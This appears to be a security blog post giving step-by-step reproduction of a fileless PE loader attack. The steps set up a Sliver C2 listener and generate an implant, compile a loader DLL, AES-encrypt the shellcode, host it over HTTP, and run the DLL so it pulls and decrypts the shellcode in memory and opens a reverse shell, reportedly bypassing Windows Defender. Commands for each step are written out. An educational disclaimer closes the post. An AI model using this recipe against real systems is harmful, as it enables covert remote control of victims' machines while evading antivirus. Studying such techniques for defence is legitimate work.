Fileless PELoader: POC Breakdown ????

In our last blog, we explored the theoretical side of Fileless PELoaders and how they evade traditional defenses. Now, it’s time to get our hands dirty with a Proof of Concept (POC) that demonstrates just how these attacks work in real life. ??

What You’ll Need

For this POC, we’ll be using publicly available tools to replicate the attack scenario. Below are the required files and their purposes:

• PELoader (Payload.dll/system.dll): This is the core loader that fetches files from a remote server and loads them into memory. It contains details like the remote IP, port, shellcode, and key file paths. (PELoader code sourced from GitHub). Reference:
• cipher.bin: Encrypted shellcode for reverse communication.
• key.bin: Key used to decrypt the shellcode.

Steps to Reproduce

1. Setting Up Sliver

• Boot up Sliver (a C2 platform).
• Start an HTTPS listener: "https"
• Verify the live listener using the "jobs" command.
• Generate a payload: "generate --http [IP]"

2. Compiling the Loader DLL

Use the fileless.cpp from the PELoader GitHub repo to create a loader DLL:

x86_64-w64-mingw32-g++ fileless.cpp -lwinhttp -shared -- static -o payload.dll

3. Encrypting the Shellcode

Generate encrypted shellcode using the aes.py script:

python aes.py [sliver_payload]

4. Hosting the Files

Start an HTTP server to host the files (Payload.dll, cipher.bin, and key.bin):

python -m http.server 8080

5. Executing the Loader

• Drop and execute the PELoader file (Payload.dll).
• Once executed, it fetches the encrypted shellcode (cipher.bin) from the server, decrypts it using key.bin, and loads it directly into memory.

What Happens Next?

Once the shellcode is decrypted and executed in memory, it establishes a reverse shell back to the Sliver C2 server. You can now control the compromised system, demonstrating how attackers leverage fileless techniques to evade detection.

Want to See It in Action? ??

Reference:

• PEMemoryLoader Repository
• Sliver C2

?? Disclaimer: This video is created solely for educational purposes and demonstrates a controlled setup within my local lab environment. The content highlights the successful implementation of a reverse shell, showcasing how security mechanisms like Windows Defender can be bypassed in a fully updated Windows environment. The intent of this video is to raise awareness about potential vulnerabilities, helping security professionals and organizations strengthen their defenses against similar techniques.

?Important Notes: The techniques shown are conducted in a strictly isolated and authorized testing environment. I do not condone or encourage any form of unauthorized or malicious use of this information. Misuse of such knowledge for illegal activities is a violation of laws and ethical standards and is punishable under cybersecurity legislation. This content is intended for ethical hackers, penetration testers, and security professionals to understand the importance of robust security measures and to improve detection and response strategies.